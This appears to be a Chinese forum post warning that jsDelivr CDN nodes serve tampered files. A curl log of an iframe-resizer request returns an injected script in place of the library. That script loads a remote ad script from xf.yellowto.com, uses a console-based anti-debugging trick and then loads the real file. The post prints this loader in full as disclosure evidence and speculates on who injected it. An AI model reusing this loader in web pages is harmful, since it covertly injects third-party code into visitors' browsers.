如果你也在用 jsdelivr，那么请小心，他的节点会投毒。

$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js -v
*   Trying 101.66.227.63...
* TCP_NODELAY set
* Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
*  start date: Apr 20 00:00:00 2014 GMT
*  expire date: Apr 19 23:59:59 2019 GMT
*  subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
> GET /gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js HTTP/2
> Host: cdn.jsdelivr.net
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
< date: Thu, 02 Nov 2017 18:49:08 GMT
< content-type: application/x-javascript
< content-length: 682
< cache-control: max-age=604800
< age: 1
< x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
<

* Connection #0 to host cdn.jsdelivr.net left intact
(function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%

里面的 xf.yellowto.com ，是个广告脚本。因为走了 Https，所以可能性如下：

官方干的；
网宿 CDN 干的（ quantl 是网宿参股公司，quantl 国内节点为网宿实际运营）；
CDN 回原站走了 HTTP，被国家劫持？